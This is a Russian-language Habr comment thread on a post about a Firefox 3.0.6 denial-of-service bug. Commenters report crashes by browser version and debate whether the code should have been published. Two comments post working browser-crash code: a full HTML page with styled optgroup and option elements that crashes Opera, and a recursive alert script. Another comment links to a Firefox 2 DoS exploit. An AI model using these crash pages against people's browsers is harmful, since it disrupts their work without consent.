Комментарии 91
>> P.S. если хабрасообщество решит, что код приводить всё же не стоило, я его уберу
еще как стоило. *потирает руки и злобно смеётся*
еще как стоило. *потирает руки и злобно смеётся*
+44
ну так на себе без кода не проверишь!
0
А где on-line пример? :)
0
Для поддержания полноты информации пояснили вы что делает конкретно код. Я вод третью строчку первый раз вижу в глаза.
+1
Минутное гугление привело на www.milw0rm.com/, но всё равно не понял что означает параметр 'BackColor'
0
Ну тогда и новость можно не делать, если все нагуглить можно ;)
+2
:) Похоже браузер должен упасть от определения фонового цвета таким образом. Интересно, у кого-то он реально свалился?
+1
например, у меня, 3.0.3
+2
Ура я нашел быстрый способ закрывать свой ff, скорость — 3 секунды :)
+17
У меня на правый верхний крестик быстрее почему то…
0
хех. воистину. 2-3 секунды уходит. делаем домен bezpalevaff.ru и там злобный код. идет начальство-открой страницу.=)
+1
А если идет начальник, а вы нажали на крестик для закрытия окна — то начальник быстренько смотрит в процессы?
А вот для быстрого перезапуска — самое оно. Только, по-моему, во время перезапуска мозилла сохраняет настройки. А с этой багой — нет.
А вот для быстрого перезапуска — самое оно. Только, по-моему, во время перезапуска мозилла сохраняет настройки. А с этой багой — нет.
0
У меня. Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.6) Gecko/2009020911 Ubuntu/8.04 (hardy) Firefox/3.0.6
+1
я этого, к сожалению, не знаю…
0
А новость откуда собственно?
Ясное дело, что хабрасообщество решит убрать этот код.
Во-первых, не стоит дразнить читателей журнала «Хакир», а во-вторых, какой вывод должно сделать хабрасообщество при просмотре этого кода?
Ясное дело, что хабрасообщество решит убрать этот код.
Во-первых, не стоит дразнить читателей журнала «Хакир», а во-вторых, какой вывод должно сделать хабрасообщество при просмотре этого кода?
-3
Я первый раз прочёл на www.securitylab.ru/poc/368700.php. А так много где заметки есть по этому поводу. На www.milw0rm.com/, например.
Если решит убрать, то конечно уберу, не вопрос.
Вывод? Что этот код может привести к падению браузера. Ну и что надо заботиться о своей безопасности
Если решит убрать, то конечно уберу, не вопрос.
Вывод? Что этот код может привести к падению браузера. Ну и что надо заботиться о своей безопасности
+1
какой вывод должно сделать хабрасообщество при просмотре этого кода?
То что не надо дереференсить нулевой указатель?
То что не надо дереференсить нулевой указатель?
+1
Что-то не падает…
0
А причём тут DoS атака?
+3
> тест (аккуратно, браузер фф скорее всего упадёт)
упал(
упал(
+1
3.1b2 тож падает =\
+2
Упал. 3.0.6, Ubuntu.
0
Устоял.
Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.6) Gecko/2009021207 GranParadiso/3.0.6
-1
3.2a1pre «Minefield» — не подвержен.
+5
Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox 3.1 Упал.
0
3.1b3pre (ночная от 18 февраля) упал. а вот с 3.2a1pre (ночная от 22 февраля) все в порядке
+2
3.0.6 — WinXP — упал моментально :)
-1
Gentoo
www-client/mozilla-firefox (3.0.6@16.02.2009): Firefox Web Browser + Noscript
полет нормальный :D
www-client/mozilla-firefox (3.0.6@16.02.2009): Firefox Web Browser + Noscript
полет нормальный :D
-1
Про код это Вы зря. Обычно, когда сообщают об уязвимости, просто говорят, что она есть.
Кстати, у мозиллы уже версия 3.0.7 в релиз-кандидатах с 20 февраля (http://ftp.mozilla.org/pub/mozilla.org/firefox/nightly/)
Кстати, у мозиллы уже версия 3.0.7 в релиз-кандидатах с 20 февраля (http://ftp.mozilla.org/pub/mozilla.org/firefox/nightly/)
0
упал. только ссылку можно убрать, там пустая страница. пришлось самому html клепать
0
зе зарепортили баг разработчикам? ))
0
код работает — ФФ 3 упал
-1
НЛО прилетело и опубликовало эту надпись здесь
кто то может код пояснить?
+2
-3
Mozilla/5.0 (X11; U; Linux x86_64; be; rv:1.9.0.6) Gecko/2009020911 Ubuntu/8.10 (intrepid) Firefox/3.0.6
падает
ФФ последнее время начинает разочаровывать, стал тормозной и не поворотливый.
падает
ФФ последнее время начинает разочаровывать, стал тормозной и не поворотливый.
0
имхо, очевидно, что с noscript или отключенным яваскриптом все будет работать))
кстати, а что этот код должен делать (кроме убийства фф)?
кстати, а что этот код должен делать (кроме убийства фф)?
+1
Спасибо, закончу сегодня свой ночной интернет-серфинг необычным способом, а то как раз спать пора :)
0
А вот и для оперы пряники:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html>
<head>
<title>SuperSelect</title>
<style type="text/css">
optgroup { display: table-row }
option { display: table-cell }
</style>
</head>
<body>
<form>
<select>
<optgroup>
<option>1</option>
<option>2</option>
</optgroup>
<optgroup>
<option>32222</option>
<option>4</option>
</optgroup>
</select>
</form>
</body>
</html>
* This source code was highlighted with Source Code Highlighter.
+3
Работает!!!
Но в то время как Опера тоже глючна, она быстрее, безопаснее и показывает меньше рекламы, и работает бытсрее фаерфокса!!(Версия 3 — вообще тормоз)
p.s. Будь проклят маркетинг и бизнес-планы, убивающие хороший код.
Но в то время как Опера тоже глючна, она быстрее, безопаснее и показывает меньше рекламы, и работает бытсрее фаерфокса!!(Версия 3 — вообще тормоз)
p.s. Будь проклят маркетинг и бизнес-планы, убивающие хороший код.
-14
- Opera/9.63 (Windows NT 5.1; U; en) Presto/2.1.1
- Opera/10.00 (Windows NT 5.1; U; en) Presto/2.2.0
Падают. Интересно. :)
+1
Ну вот вам на ff2. Не закрывают второй год.
myiworm.com/public/exploits/firefox2/firefox_2_0_0_9-denial_of_service_2.html
myiworm.com/public/exploits/firefox2/firefox_2_0_0_9-denial_of_service_2.html
0
да падает…
причем под линухами процесс висит еще долго и kill убивать его не хочет…
причем под линухами процесс висит еще долго и kill убивать его не хочет…
0
Работает конечно отлично, а какое может быть реально применение этой баги? Т.е как мне могут этим навредить кроме того, что у меня браузер закроется? Если я правильно понимаю именно по-этому в багзилле до сих пор статус стоит нормал…
0
На хабре этот код бы под кнопку написать. Как долго вы бы думали что это и почему так происходит?
Приминение может быть быть в сфере зления пользователя так сказать, это тоже не мало.
Приминение может быть быть в сфере зления пользователя так сказать, это тоже не мало.
0
Все это так называемый киддинг… реальной экономической выгоды… финансовая выгода, к примеру, заставляет людей писать трояны =) и по-этому баги которые влекут за собой распространения троянов обозначают как «важно», а эта бага пустышка… ну закрылся бразуер и что? не один адекватный хакер не будет вешать это на взломанный ресурс.
0
Ну упал и упал. У меня вон фокс падает при открытии pdf. Вот это проблемка. А тут я даже сначало и не понял почему не работает, а потом вспомнил про Noscript. :)
Скрипты эт такая штука, что отказ в обслуживании можно сделать сотнями (тысяч) способов. Вот например
<script language=«Javascript»>
function bu(){ alert('BU'); bu(); };
bu();
</script>
Или это тоже считается эксплойтом и эксплуатирует какую-то уязвимость.
Скрипты эт такая штука, что отказ в обслуживании можно сделать сотнями (тысяч) способов. Вот например
<script language=«Javascript»>
function bu(){ alert('BU'); bu(); };
bu();
</script>
Или это тоже считается эксплойтом и эксплуатирует какую-то уязвимость.
+1
Mozilla/5.0 (X11; U; Linux i686; ru; rv:1.9.0.6) Gecko/2009020709 Fedora/3.0.6-1.0.140asp Firefox/3.0.6 рухнул…
*ушел ставить Noscript
*ушел ставить Noscript
-1
SeaMonkey 2.0b1pre — не падает :)
(Noscript не стоит)
(Noscript не стоит)
0
упал…
0
Ну падает и падает, где собственно проблема? Данные пользователя можно прочитать — нет. Использовать уязвимость для построения ботнета — нет. Возможностей положить любой браузер корявым джаваскриптом куча. Чинить надо, как и много других багов, но приоритет явно на багах где есть проблемы с безопастностью.
+2
НЛО прилетело и опубликовало эту надпись здесь
Хаха, думал фейк или пофиксили уже — слетело всё :)))
0
Зарегистрируйтесь на Хабре, чтобы оставить комментарий
DoS атака Mozilla Firefox 3.0.6